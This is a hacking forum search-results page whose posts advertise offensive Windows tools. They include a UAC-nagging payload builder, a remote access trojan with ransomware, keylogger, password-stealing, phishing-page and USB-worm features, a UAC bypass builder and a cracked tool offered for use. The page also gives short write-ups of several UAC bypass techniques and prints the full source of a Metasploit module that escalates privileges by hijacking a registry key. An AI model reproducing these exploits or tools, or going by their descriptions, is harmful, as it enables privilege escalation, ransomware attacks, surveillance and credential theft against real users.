Search the Community

ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings [hide][Hidden Content]]

Verci Spy System RAT | Ransomware | NSA Exploits | UAC | Spread Verci Spy System OR Verci_Spy_System This Tool Was Designed By US,This Tool is a Remote Access Trojan That you can Take over any Windows machine into your control and can do many things within that infected PC , also the infected PC will have a virus that will spread rapidly within usb-sticks and make other safe PCs infected too , by inserting the usb into it and click any of the shortcuts and so on . That Tool was designed for some educational purposes and some testing for PC security and we are not responsible for any illegal use for it , this tool also designed for a Better Hacking Visual Effects , that can deliver you a feeling of real hacker , you can use it within hacking movies , and have some animations and a localization map for detecting victims allover the world ,and Verci Wasn`t Cracked after it`s trial version was release , but the installer wasn`t cracked before , also Our XPR Tool , but we will not going into same mistake and not release any trial version for free . and this is program options that you can do with the infected PC and you took control on it : 1-UAC (User Access Control) Manager (Enable or Disable) 2-Open remote Webcam / Microphone 3-Control Remote Desktop 4-File Manager Controller 5-Process Manager 6-Regedit Controller 7-Services Manager 8-Devices & Printers Viewer 9-Active Windows Manager 10-View Remote WiFi Networks 11-View Saved WIFI Passwords 12-Ransomwares [ You Have 2 Ransomwares] (Try anyone you wish) 13-WiFi Hotspot Creator [Use any other device to check the Hotspot] 14-Lan Computer Manager [Lan Spread (Premium Only)] 15-Network Connections/Drivers Manager 16-Scan Remote websites ports 17-Scan Lan network devices ports 18-Manage installed Programs 19-Unmovable chat system 20-Clipboard Manager [Images & Text] (Set & Get Clipboard) 21-Remote Command prompt 22-Code Compiler 23-Saved Password Stealer (Updated) 24-Remote Keylogger (Offline/Online) 25-DDOS Attack Manager / Http Flooder 26-Full Computer information Manager 27-(Installed Pyhton Scripts) a) This Option allow you to install Sqlmap Script in Client PC and Hack any infected sites using it _By this way Client PC will be saved in site logs not your PC 28-Run File (From Disk/Url) 29-Open Url (Default Browser)[Or](Any Browser) 30-Automatic Victim Transfer Option [Transfer to any host or external IP] 31- NoIP Updater 32-Ransomware Builder [Build own Ransomware with your own Bitcoin] 33-Notify With Client Webcam image 34-Spam options : a) You can open fake Facebook login page in Client PC and grab passwords in keylogger b) You can open fake Paypal login page in Client PC and grab passwords in keylogger c) You can open fake Visa card number confirmation page in Client PC and grab information in keylogger 36-Auto Share Client Drivers over Lan Ransomware Builder Manager : This is the scheme of Ransomware *) Generate Random password of 15 random chosen Characters *) Start Encrypting all files exist in user Directory using the password *) Kills explorer.exe *) Kills Microsoft.Exchange *) Kills MSExchange *) Kills sqlserver.exe *) Kills sqlwriter.exe *) Kills mysqld.exe *) Delete all Shadow copies *) Usb spread (shortcut)[.lnk] *) Keep loop to Encrypt all files exist in other Drives using the password Available Trojans : 2 Trojans - 2 Downloaders: a) Full Control (Size : 400 Kilobytes) b)Worm Control (Size : 170 Kilobytes) c).exe Downloader (Size : 11 Kilobytes) d).vbs Downloader (Size : 909 Bytes) Preview Image 1 : You can now Enter Free Port You Choose Manual and Click Ok Preview Image 2 : Fast Look To Exit FullScreen Press "Click To Restore" Downloads: [Hidden Content]

UAC Escaper v0.1 This is an old method to bypass UAC. I created this simple builder to make it easy to compile without the need for IDE. Just drop and drag your file to make it bypass UAC. Tested on win7 64bit SP1 + win10 64bit "latest version" [Hidden Content]

Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe) Metasploit Module [Hidden Content] Powershell Code [Hidden Content] Code in C [hide][Hidden Content]]

This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). View the full article

This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. View the full article

There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. View the full article

This script is a proof of concept to bypass the Microsoft Windows User Access Control (UAC) via SluiFileHandlerHijackLPE. View the full article

[Hidden Content]

## # This module requires Metasploit: [Hidden Content] # Current source: [Hidden Content] ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::Windows::Priv include Post::Windows::Registry include Post::Windows::Runas COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze EXEC_REG_VAL = ''.freeze # This maps to "(Default)" EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze CMD_MAX_LEN = 16383 def initialize(info = {}) super( update_info( info, 'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)', 'Description' => %q{ This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows computerdefault.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ 'St0rn - Synetis.com', # UAC bypass discovery and research 'St0rn - [email protected]', # MSF module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', '[Hidden Content]' ] ], 'DisclosureDate' => 'October 22 2018' ) ) end def check if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 if session.arch == ARCH_X86 # fodhelper.exe is x64 only exe commspec = '%WINDIR%\\Sysnative\\cmd.exe' if target_arch.first == ARCH_X64 # We can't use absolute path here as # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session psh_path = "powershell.exe" end end if target_arch.first == ARCH_X86 # Invoking x86, so switch to SysWOW64 psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" end else # if we're on x86, we can't handle x64 payloads if target_arch.first == ARCH_X64 fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') end end if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end # Validate that we can actually do things before we bother # doing any more work check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end payload_value = rand_text_alpha(8) psh_path = expand_path(psh_path) template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) if psh_payload.length > CMD_MAX_LEN fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") end psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? if existing.empty? registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view) end print_status("Configuring payload and stager registry keys ...") unless exist_delegate registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) end registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}") print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? Rex::sleep(5) handler(client) print_status("Cleaining up registry keys ...") unless exist_delegate registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) end if existing.empty? registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view) else registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view) end def check_permissions! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end print_status('UAC is Enabled, checking level...') if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end

This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. View the full article

This exploit permits an attacker to bypass UAC by hijacking a registry key during computerSecurity.exe (auto elevate windows binary) execution. View the full article

Full credit to original cracker (kalipo) Its another hf product....just posting for anyone who wishes to use it SALES THREAD: Mirror: [HIDE][Hidden Content]]